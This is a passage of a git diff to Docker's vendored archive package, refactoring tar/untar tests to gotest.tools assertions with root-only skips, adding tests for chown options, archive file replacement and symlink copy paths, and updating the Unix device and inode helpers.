-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	err = UntarPath(tarFile, invalidDestFolder)
+	err = defaultUntarPath(tarFile, invalidDestFolder)
 	if err == nil {
 		t.Fatalf("UntarPath with invalid destination path should throw an error.")
 	}
@@ -310,17 +298,16 @@ func TestUntarPathWithInvalidSrc(t *testing.T) {
 		t.Fatalf("Fail to create the destination file")
 	}
 	defer os.RemoveAll(dest)
-	err = UntarPath("/invalid/path", dest)
+	err = defaultUntarPath("/invalid/path", dest)
 	if err == nil {
 		t.Fatalf("UntarPath with invalid src path should throw an error.")
 	}
 }
 
 func TestUntarPath(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpFolder, err := ioutil.TempDir("", "docker-archive-test")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(tmpFolder)
 	srcFile := filepath.Join(tmpFolder, "src")
 	tarFile := filepath.Join(tmpFolder, "src.tar")
@@ -341,11 +328,9 @@ func TestUntarPath(t *testing.T) {
 	}
 	cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU)
 	_, err = cmd.CombinedOutput()
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	err = UntarPath(tarFile, destFolder)
+	err = defaultUntarPath(tarFile, destFolder)
 	if err != nil {
 		t.Fatalf("UntarPath shouldn't throw an error, %s.", err)
 	}
@@ -384,7 +369,7 @@ func TestUntarPathWithDestinationFile(t *testing.T) {
 	if err != nil {
 		t.Fatalf("Fail to create the destination file")
 	}
-	err = UntarPath(tarFile, destFile)
+	err = defaultUntarPath(tarFile, destFile)
 	if err == nil {
 		t.Fatalf("UntarPath should throw an error if the destination if a file")
 	}
@@ -427,7 +412,7 @@ func TestUntarPathWithDestinationSrcFileAsFolder(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	err = UntarPath(tarFile, destFolder)
+	err = defaultUntarPath(tarFile, destFolder)
 	if err != nil {
 		t.Fatalf("UntarPath should throw not throw an error if the extracted file already exists and is a folder")
 	}
@@ -444,13 +429,14 @@ func TestCopyWithTarInvalidSrc(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	err = CopyWithTar(invalidSrc, destFolder)
+	err = defaultCopyWithTar(invalidSrc, destFolder)
 	if err == nil {
 		t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.")
 	}
 }
 
 func TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tempFolder, err := ioutil.TempDir("", "docker-archive-test")
 	if err != nil {
 		t.Fatal(nil)
@@ -461,7 +447,7 @@ func TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	err = CopyWithTar(srcFolder, inexistentDestFolder)
+	err = defaultCopyWithTar(srcFolder, inexistentDestFolder)
 	if err != nil {
 		t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.")
 	}
@@ -490,7 +476,7 @@ func TestCopyWithTarSrcFile(t *testing.T) {
 		t.Fatal(err)
 	}
 	ioutil.WriteFile(src, []byte("content"), 0777)
-	err = CopyWithTar(src, dest)
+	err = defaultCopyWithTar(src, dest)
 	if err != nil {
 		t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err)
 	}
@@ -519,7 +505,7 @@ func TestCopyWithTarSrcFolder(t *testing.T) {
 		t.Fatal(err)
 	}
 	ioutil.WriteFile(filepath.Join(src, "file"), []byte("content"), 0777)
-	err = CopyWithTar(src, dest)
+	err = defaultCopyWithTar(src, dest)
 	if err != nil {
 		t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err)
 	}
@@ -542,7 +528,7 @@ func TestCopyFileWithTarInvalidSrc(t *testing.T) {
 		t.Fatal(err)
 	}
 	invalidFile := filepath.Join(tempFolder, "doesnotexists")
-	err = CopyFileWithTar(invalidFile, destFolder)
+	err = defaultCopyFileWithTar(invalidFile, destFolder)
 	if err == nil {
 		t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.")
 	}
@@ -560,7 +546,7 @@ func TestCopyFileWithTarInexistentDestWillCreateIt(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	err = CopyFileWithTar(srcFile, inexistentDestFolder)
+	err = defaultCopyFileWithTar(srcFile, inexistentDestFolder)
 	if err != nil {
 		t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.")
 	}
@@ -587,7 +573,7 @@ func TestCopyFileWithTarSrcFolder(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	err = CopyFileWithTar(src, dest)
+	err = defaultCopyFileWithTar(src, dest)
 	if err == nil {
 		t.Fatalf("CopyFileWithTar should throw an error with a folder.")
 	}
@@ -611,7 +597,7 @@ func TestCopyFileWithTarSrcFile(t *testing.T) {
 		t.Fatal(err)
 	}
 	ioutil.WriteFile(src, []byte("content"), 0777)
-	err = CopyWithTar(src, dest+"/")
+	err = defaultCopyWithTar(src, dest+"/")
 	if err != nil {
 		t.Fatalf("archiver.CopyFileWithTar shouldn't throw an error, %s.", err)
 	}
@@ -654,7 +640,7 @@ func checkNoChanges(fileNum int, hardlinks bool) error {
 		return err
 	}
 
-	err = TarUntar(srcDir, destDir)
+	err = defaultTarUntar(srcDir, destDir)
 	if err != nil {
 		return err
 	}
@@ -742,6 +728,57 @@ func TestTarUntar(t *testing.T) {
 	}
 }
 
+func TestTarWithOptionsChownOptsAlwaysOverridesIdPair(t *testing.T) {
+	origin, err := ioutil.TempDir("", "docker-test-tar-chown-opt")
+	assert.NilError(t, err)
+
+	defer os.RemoveAll(origin)
+	filePath := filepath.Join(origin, "1")
+	err = ioutil.WriteFile(filePath, []byte("hello world"), 0700)
+	assert.NilError(t, err)
+
+	idMaps := []idtools.IDMap{
+		0: {
+			ContainerID: 0,
+			HostID:      0,
+			Size:        65536,
+		},
+		1: {
+			ContainerID: 0,
+			HostID:      100000,
+			Size:        65536,
+		},
+	}
+
+	cases := []struct {
+		opts        *TarOptions
+		expectedUID int
+		expectedGID int
+	}{
+		{&TarOptions{ChownOpts: &idtools.IDPair{UID: 1337, GID: 42}}, 1337, 42},
+		{&TarOptions{ChownOpts: &idtools.IDPair{UID: 100001, GID: 100001}, UIDMaps: idMaps, GIDMaps: idMaps}, 100001, 100001},
+		{&TarOptions{ChownOpts: &idtools.IDPair{UID: 0, GID: 0}, NoLchown: false}, 0, 0},
+		{&TarOptions{ChownOpts: &idtools.IDPair{UID: 1, GID: 1}, NoLchown: true}, 1, 1},
+		{&TarOptions{ChownOpts: &idtools.IDPair{UID: 1000, GID: 1000}, NoLchown: true}, 1000, 1000},
+	}
+	for _, testCase := range cases {
+		reader, err := TarWithOptions(filePath, testCase.opts)
+		assert.NilError(t, err)
+		tr := tar.NewReader(reader)
+		defer reader.Close()
+		for {
+			hdr, err := tr.Next()
+			if err == io.EOF {
+				// end of tar archive
+				break
+			}
+			assert.NilError(t, err)
+			assert.Check(t, is.Equal(hdr.Uid, testCase.expectedUID), "Uid equals expected value")
+			assert.Check(t, is.Equal(hdr.Gid, testCase.expectedGID), "Gid equals expected value")
+		}
+	}
+}
+
 func TestTarWithOptions(t *testing.T) {
 	// TODO Windows: Figure out how to fix this test.
 	if runtime.GOOS == "windows" {
@@ -868,7 +905,7 @@ func BenchmarkTarUntar(b *testing.B) {
 	b.ResetTimer()
 	b.SetBytes(int64(n))
 	for n := 0; n < b.N; n++ {
-		err := TarUntar(origin, target)
+		err := defaultTarUntar(origin, target)
 		if err != nil {
 			b.Fatal(err)
 		}
@@ -896,7 +933,7 @@ func BenchmarkTarUntarWithLinks(b *testing.B) {
 	b.ResetTimer()
 	b.SetBytes(int64(n))
 	for n := 0; n < b.N; n++ {
-		err := TarUntar(origin, target)
+		err := defaultTarUntar(origin, target)
 		if err != nil {
 			b.Fatal(err)
 		}
@@ -934,9 +971,8 @@ func TestUntarInvalidFilenames(t *testing.T) {
 
 func TestUntarHardlinkToSymlink(t *testing.T) {
 	// TODO Windows. There may be a way of running this, but turning off for now
-	if runtime.GOOS == "windows" {
-		t.Skip("hardlinks on Windows")
-	}
+	skip.If(t, runtime.GOOS == "windows", "hardlinks on Windows")
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	for i, headers := range [][]*tar.Header{
 		{
 			{
@@ -1149,8 +1185,10 @@ func TestUntarInvalidSymlink(t *testing.T) {
 func TestTempArchiveCloseMultipleTimes(t *testing.T) {
 	reader := ioutil.NopCloser(strings.NewReader("hello"))
 	tempArchive, err := NewTempArchive(reader, "")
+	assert.NilError(t, err)
 	buf := make([]byte, 10)
 	n, err := tempArchive.Read(buf)
+	assert.NilError(t, err)
 	if n != 5 {
 		t.Fatalf("Expected to read 5 bytes. Read %d instead", n)
 	}
@@ -1160,3 +1198,167 @@ func TestTempArchiveCloseMultipleTimes(t *testing.T) {
 		}
 	}
 }
+
+func TestReplaceFileTarWrapper(t *testing.T) {
+	filesInArchive := 20
+	testcases := []struct {
+		doc       string
+		filename  string
+		modifier  TarModifierFunc
+		expected  string
+		fileCount int
+	}{
+		{
+			doc:       "Modifier creates a new file",
+			filename:  "newfile",
+			modifier:  createModifier(t),
+			expected:  "the new content",
+			fileCount: filesInArchive + 1,
+		},
+		{
+			doc:       "Modifier replaces a file",
+			filename:  "file-2",
+			modifier:  createOrReplaceModifier,
+			expected:  "the new content",
+			fileCount: filesInArchive,
+		},
+		{
+			doc:       "Modifier replaces the last file",
+			filename:  fmt.Sprintf("file-%d", filesInArchive-1),
+			modifier:  createOrReplaceModifier,
+			expected:  "the new content",
+			fileCount: filesInArchive,
+		},
+		{
+			doc:       "Modifier appends to a file",
+			filename:  "file-3",
+			modifier:  appendModifier,
+			expected:  "fooo\nnext line",
+			fileCount: filesInArchive,
+		},
+	}
+
+	for _, testcase := range testcases {
+		sourceArchive, cleanup := buildSourceArchive(t, filesInArchive)
+		defer cleanup()
+
+		resultArchive := ReplaceFileTarWrapper(
+			sourceArchive,
+			map[string]TarModifierFunc{testcase.filename: testcase.modifier})
+
+		actual := readFileFromArchive(t, resultArchive, testcase.filename, testcase.fileCount, testcase.doc)
+		assert.Check(t, is.Equal(testcase.expected, actual), testcase.doc)
+	}
+}
+
+// TestPrefixHeaderReadable tests that files that could be created with the
+// version of this package that was built with <=go17 are still readable.
+func TestPrefixHeaderReadable(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
+	// https://gist.github.com/stevvooe/e2a790ad4e97425896206c0816e1a882#file-out-go
+	var testFile = []byte("\x1f\x8b\x08\x08\x44\x21\x68\x59\x00\x03\x74\x2e\x74\x61\x72\x00\x4b\xcb\xcf\x67\xa0\x35\x30\x80\x00\x86\x06\x10\x47\x01\xc1\x37\x40\x00\x54\xb6\xb1\xa1\xa9\x99\x09\x48\x25\x1d\x40\x69\x71\x49\x62\x91\x02\xe5\x76\xa1\x79\x84\x21\x91\xd6\x80\x72\xaf\x8f\x82\x51\x30\x0a\x46\x36\x00\x00\xf0\x1c\x1e\x95\x00\x06\x00\x00")
+
+	tmpDir, err := ioutil.TempDir("", "prefix-test")
+	assert.NilError(t, err)
+	defer os.RemoveAll(tmpDir)
+	err = Untar(bytes.NewReader(testFile), tmpDir, nil)
+	assert.NilError(t, err)
+
+	baseName := "foo"
+	pth := strings.Repeat("a", 100-len(baseName)) + "/" + baseName
+
+	_, err = os.Lstat(filepath.Join(tmpDir, pth))
+	assert.NilError(t, err)
+}
+
+func buildSourceArchive(t *testing.T, numberOfFiles int) (io.ReadCloser, func()) {
+	srcDir, err := ioutil.TempDir("", "docker-test-srcDir")
+	assert.NilError(t, err)
+
+	_, err = prepareUntarSourceDirectory(numberOfFiles, srcDir, false)
+	assert.NilError(t, err)
+
+	sourceArchive, err := TarWithOptions(srcDir, &TarOptions{})
+	assert.NilError(t, err)
+	return sourceArchive, func() {
+		os.RemoveAll(srcDir)
+		sourceArchive.Close()
+	}
+}
+
+func createOrReplaceModifier(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) {
+	return &tar.Header{
+		Mode:     0600,
+		Typeflag: tar.TypeReg,
+	}, []byte("the new content"), nil
+}
+
+func createModifier(t *testing.T) TarModifierFunc {
+	return func(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) {
+		assert.Check(t, is.Nil(content))
+		return createOrReplaceModifier(path, header, content)
+	}
+}
+
+func appendModifier(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) {
+	buffer := bytes.Buffer{}
+	if content != nil {
+		if _, err := buffer.ReadFrom(content); err != nil {
+			return nil, nil, err
+		}
+	}
+	buffer.WriteString("\nnext line")
+	return &tar.Header{Mode: 0600, Typeflag: tar.TypeReg}, buffer.Bytes(), nil
+}
+
+func readFileFromArchive(t *testing.T, archive io.ReadCloser, name string, expectedCount int, doc string) string {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
+	destDir, err := ioutil.TempDir("", "docker-test-destDir")
+	assert.NilError(t, err)
+	defer os.RemoveAll(destDir)
+
+	err = Untar(archive, destDir, nil)
+	assert.NilError(t, err)
+
+	files, _ := ioutil.ReadDir(destDir)
+	assert.Check(t, is.Len(files, expectedCount), doc)
+
+	content, err := ioutil.ReadFile(filepath.Join(destDir, name))
+	assert.Check(t, err)
+	return string(content)
+}
+
+func TestDisablePigz(t *testing.T) {
+	_, err := exec.LookPath("unpigz")
+	if err != nil {
+		t.Log("Test will not check full path when Pigz not installed")
+	}
+
+	os.Setenv("MOBY_DISABLE_PIGZ", "true")
+	defer os.Unsetenv("MOBY_DISABLE_PIGZ")
+
+	r := testDecompressStream(t, "gz", "gzip -f")
+	// For the bufio pool
+	outsideReaderCloserWrapper := r.(*ioutils.ReadCloserWrapper)
+	// For the context canceller
+	contextReaderCloserWrapper := outsideReaderCloserWrapper.Reader.(*ioutils.ReadCloserWrapper)
+
+	assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&gzip.Reader{}))
+}
+
+func TestPigz(t *testing.T) {
+	r := testDecompressStream(t, "gz", "gzip -f")
+	// For the bufio pool
+	outsideReaderCloserWrapper := r.(*ioutils.ReadCloserWrapper)
+	// For the context canceller
+	contextReaderCloserWrapper := outsideReaderCloserWrapper.Reader.(*ioutils.ReadCloserWrapper)
+
+	_, err := exec.LookPath("unpigz")
+	if err == nil {
+		t.Log("Tested whether Pigz is used, as it installed")
+		assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&io.PipeReader{}))
+	} else {
+		t.Log("Tested whether Pigz is not used, as it not installed")
+		assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&gzip.Reader{}))
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go
index 7083f2fa53..e81076c170 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
@@ -9,8 +9,10 @@ import (
 	"path/filepath"
 	"syscall"
 
+	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/system"
 	rsystem "github.com/opencontainers/runc/libcontainer/system"
+	"golang.org/x/sys/unix"
 )
 
 // fixVolumePathPrefix does platform specific processing to ensure that if
@@ -41,41 +43,38 @@ func chmodTarEntry(perm os.FileMode) os.FileMode {
 	return perm // noop for unix as golang APIs provide perm bits correctly
 }
 
-func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) {
+func setHeaderForSpecialDevice(hdr *tar.Header, name string, stat interface{}) (err error) {
 	s, ok := stat.(*syscall.Stat_t)
 
-	if !ok {
-		err = errors.New("cannot convert stat value to syscall.Stat_t")
-		return
+	if ok {
+		// Currently go does not fill in the major/minors
+		if s.Mode&unix.S_IFBLK != 0 ||
+			s.Mode&unix.S_IFCHR != 0 {
+			hdr.Devmajor = int64(unix.Major(uint64(s.Rdev))) // nolint: unconvert
+			hdr.Devminor = int64(unix.Minor(uint64(s.Rdev))) // nolint: unconvert
+		}
 	}
 
-	inode = uint64(s.Ino)
+	return
+}
+
+func getInodeFromStat(stat interface{}) (inode uint64, err error) {
+	s, ok := stat.(*syscall.Stat_t)
 
-	// Currently go does not fill in the major/minors
-	if s.Mode&syscall.S_IFBLK != 0 ||
-		s.Mode&syscall.S_IFCHR != 0 {
-		hdr.Devmajor = int64(major(uint64(s.Rdev)))
-		hdr.Devminor = int64(minor(uint64(s.Rdev)))
+	if ok {
+		inode = s.Ino
 	}
 
 	return
 }
 
-func getFileUIDGID(stat interface{}) (int, int, error) {
+func getFileUIDGID(stat interface{}) (idtools.IDPair, error) {
 	s, ok := stat.(*syscall.Stat_t)
 
 	if !ok {
-		return -1, -1, errors.New("cannot convert stat value to syscall.Stat_t")
+		return idtools.IDPair{}, errors.New("cannot convert stat value to syscall.Stat_t")
 	}
-	return int(s.Uid), int(s.Gid), nil
-}
-
-func major(device uint64) uint64 {
-	return (device >> 8) & 0xfff
-}
-
-func minor(device uint64) uint64 {
-	return (device & 0xff) | ((device >> 12) & 0xfff00)
+	return idtools.IDPair{UID: int(s.Uid), GID: int(s.Gid)}, nil
 }
 
 // handleTarTypeBlockCharFifo is an OS-specific helper function used by
@@ -89,17 +88,14 @@ func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error {
 	mode := uint32(hdr.Mode & 07777)
 	switch hdr.Typeflag {
 	case tar.TypeBlock:
-		mode |= syscall.S_IFBLK
+		mode |= unix.S_IFBLK
 	case tar.TypeChar:
-		mode |= syscall.S_IFCHR
+		mode |= unix.S_IFCHR
 	case tar.TypeFifo:
-		mode |= syscall.S_IFIFO
+		mode |= unix.S_IFIFO
 	}
 
-	if err := system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor))); err != nil {
-		return err
-	}
-	return nil
+	return system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor)))
 }
 
 func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error {
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go
index 4eeafdd128..808878d094 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"bytes"
@@ -8,11 +8,15 @@ import (
 	"io/ioutil"
 	"os"
 	"path/filepath"
-	"runtime"
+	"strings"
 	"syscall"
 	"testing"
 
 	"github.com/docker/docker/pkg/system"
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
 )
 
 func TestCanonicalTarNameForPath(t *testing.T) {
@@ -69,60 +73,89 @@ func TestChmodTarEntry(t *testing.T) {
 
 func TestTarWithHardLink(t *testing.T) {
 	origin, err := ioutil.TempDir("", "docker-test-tar-hardlink")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(origin)
-	if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil {
-		t.Fatal(err)
-	}
-	if err := os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")); err != nil {
-		t.Fatal(err)
-	}
+
+	err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700)
+	assert.NilError(t, err)
+
+	err = os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2"))
+	assert.NilError(t, err)
 
 	var i1, i2 uint64
-	if i1, err = getNlink(filepath.Join(origin, "1")); err != nil {
-		t.Fatal(err)
-	}
+	i1, err = getNlink(filepath.Join(origin, "1"))
+	assert.NilError(t, err)
+
 	// sanity check that we can hardlink
 	if i1 != 2 {
 		t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1)
 	}
 
 	dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(dest)
 
 	// we'll do this in two steps to separate failure
 	fh, err := Tar(origin, Uncompressed)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	// ensure we can read the whole thing with no error, before writing back out
 	buf, err := ioutil.ReadAll(fh)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	bRdr := bytes.NewReader(buf)
 	err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed})
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	if i1, err = getInode(filepath.Join(dest, "1")); err != nil {
-		t.Fatal(err)
-	}
-	if i2, err = getInode(filepath.Join(dest, "2")); err != nil {
-		t.Fatal(err)
-	}
+	i1, err = getInode(filepath.Join(dest, "1"))
+	assert.NilError(t, err)
 
-	if i1 != i2 {
-		t.Errorf("expected matching inodes, but got %d and %d", i1, i2)
+	i2, err = getInode(filepath.Join(dest, "2"))
+	assert.NilError(t, err)
+
+	assert.Check(t, is.Equal(i1, i2))
+}
+
+func TestTarWithHardLinkAndRebase(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "docker-test-tar-hardlink-rebase")
+	assert.NilError(t, err)
+	defer os.RemoveAll(tmpDir)
+
+	origin := filepath.Join(tmpDir, "origin")
+	err = os.Mkdir(origin, 0700)
+	assert.NilError(t, err)
+
+	err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700)
+	assert.NilError(t, err)
+
+	err = os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2"))
+	assert.NilError(t, err)
+
+	var i1, i2 uint64
+	i1, err = getNlink(filepath.Join(origin, "1"))
+	assert.NilError(t, err)
+
+	// sanity check that we can hardlink
+	if i1 != 2 {
+		t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1)
 	}
+
+	dest := filepath.Join(tmpDir, "dest")
+	bRdr, err := TarResourceRebase(origin, "origin")
+	assert.NilError(t, err)
+
+	dstDir, srcBase := SplitPathDirEntry(origin)
+	_, dstBase := SplitPathDirEntry(dest)
+	content := RebaseArchiveEntries(bRdr, srcBase, dstBase)
+	err = Untar(content, dstDir, &TarOptions{Compression: Uncompressed, NoLchown: true, NoOverwriteDirNonDir: true})
+	assert.NilError(t, err)
+
+	i1, err = getInode(filepath.Join(dest, "1"))
+	assert.NilError(t, err)
+	i2, err = getInode(filepath.Join(dest, "2"))
+	assert.NilError(t, err)
+
+	assert.Check(t, is.Equal(i1, i2))
 }
 
 func getNlink(path string) (uint64, error) {
@@ -151,52 +184,40 @@ func getInode(path string) (uint64, error) {
 }
 
 func TestTarWithBlockCharFifo(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	origin, err := ioutil.TempDir("", "docker-test-tar-hardlink")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	defer os.RemoveAll(origin)
-	if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil {
-		t.Fatal(err)
-	}
-	if err := system.Mknod(filepath.Join(origin, "2"), syscall.S_IFBLK, int(system.Mkdev(int64(12), int64(5)))); err != nil {
-		t.Fatal(err)
-	}
-	if err := system.Mknod(filepath.Join(origin, "3"), syscall.S_IFCHR, int(system.Mkdev(int64(12), int64(5)))); err != nil {
-		t.Fatal(err)
-	}
-	if err := system.Mknod(filepath.Join(origin, "4"), syscall.S_IFIFO, int(system.Mkdev(int64(12), int64(5)))); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700)
+	assert.NilError(t, err)
+
+	err = system.Mknod(filepath.Join(origin, "2"), unix.S_IFBLK, int(system.Mkdev(int64(12), int64(5))))
+	assert.NilError(t, err)
+	err = system.Mknod(filepath.Join(origin, "3"), unix.S_IFCHR, int(system.Mkdev(int64(12), int64(5))))
+	assert.NilError(t, err)
+	err = system.Mknod(filepath.Join(origin, "4"), unix.S_IFIFO, int(system.Mkdev(int64(12), int64(5))))
+	assert.NilError(t, err)
 
 	dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(dest)
 
 	// we'll do this in two steps to separate failure
 	fh, err := Tar(origin, Uncompressed)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	// ensure we can read the whole thing with no error, before writing back out
 	buf, err := ioutil.ReadAll(fh)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	bRdr := bytes.NewReader(buf)
 	err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed})
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	changes, err := ChangesDirs(origin, dest)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	if len(changes) > 0 {
 		t.Fatalf("Tar with special device (block, char, fifo) should keep them (recreate them when untar) : %v", changes)
 	}
@@ -204,26 +225,19 @@ func TestTarWithBlockCharFifo(t *testing.T) {
 
 // TestTarUntarWithXattr is Unix as Lsetxattr is not supported on Windows
 func TestTarUntarWithXattr(t *testing.T) {
-	if runtime.GOOS == "solaris" {
-		t.Skip()
-	}
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	origin, err := ioutil.TempDir("", "docker-test-untar-origin")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(origin)
-	if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil {
-		t.Fatal(err)
-	}
-	if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil {
-		t.Fatal(err)
-	}
-	if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil {
-		t.Fatal(err)
-	}
-	if err := system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700)
+	assert.NilError(t, err)
+
+	err = ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700)
+	assert.NilError(t, err)
+	err = ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700)
+	assert.NilError(t, err)
+	err = system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0)
+	assert.NilError(t, err)
 
 	for _, c := range []Compression{
 		Uncompressed,
@@ -247,3 +261,58 @@ func TestTarUntarWithXattr(t *testing.T) {
 		}
 	}
 }
+
+func TestCopyInfoDestinationPathSymlink(t *testing.T) {
+	tmpDir, _ := getTestTempDirs(t)
+	defer removeAllPaths(tmpDir)
+
+	root := strings.TrimRight(tmpDir, "/") + "/"
+
+	type FileTestData struct {
+		resource FileData
+		file     string
+		expected CopyInfo
+	}
+
+	testData := []FileTestData{
+		//Create a directory: /tmp/archive-copy-test*/dir1
+		//Test will "copy" file1 to dir1
+		{resource: FileData{filetype: Dir, path: "dir1", permissions: 0740}, file: "file1", expected: CopyInfo{Path: root + "dir1/file1", Exists: false, IsDir: false}},
+
+		//Create a symlink directory to dir1: /tmp/archive-copy-test*/dirSymlink -> dir1
+		//Test will "copy" file2 to dirSymlink
+		{resource: FileData{filetype: Symlink, path: "dirSymlink", contents: root + "dir1", permissions: 0600}, file: "file2", expected: CopyInfo{Path: root + "dirSymlink/file2", Exists: false, IsDir: false}},
+
+		//Create a file in tmp directory: /tmp/archive-copy-test*/file1
+		//Test to cover when the full file path already exists.
+		{resource: FileData{filetype: Regular, path: "file1", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "file1", Exists: true}},
+
+		//Create a directory: /tmp/archive-copy*/dir2
+		//Test to cover when the full directory path already exists
+		{resource: FileData{filetype: Dir, path: "dir2", permissions: 0740}, file: "", expected: CopyInfo{Path: root + "dir2", Exists: true, IsDir: true}},
+
+		//Create a symlink to a non-existent target: /tmp/archive-copy*/symlink1 -> noSuchTarget
+		//Negative test to cover symlinking to a target that does not exit
+		{resource: FileData{filetype: Symlink, path: "symlink1", contents: "noSuchTarget", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "noSuchTarget", Exists: false}},
+
+		//Create a file in tmp directory for next test: /tmp/existingfile
+		{resource: FileData{filetype: Regular, path: "existingfile", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "existingfile", Exists: true}},
+
+		//Create a symlink to an existing file: /tmp/archive-copy*/symlink2 -> /tmp/existingfile
+		//Test to cover when the parent directory of a new file is a symlink
+		{resource: FileData{filetype: Symlink, path: "symlink2", contents: "existingfile", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "existingfile", Exists: true}},
+	}
+
+	var dirs []FileData
+	for _, data := range testData {
+		dirs = append(dirs, data.resource)
+	}
+	provisionSampleDir(t, tmpDir, dirs)
+
+	for _, info := range testData {
+		p := filepath.Join(tmpDir, info.resource.path, info.file)
+		ci, err := CopyInfoDestinationPath(p)
+		assert.Check(t, err)
+		assert.Check(t, is.DeepEqual(info.expected, ci))
+	}
+}
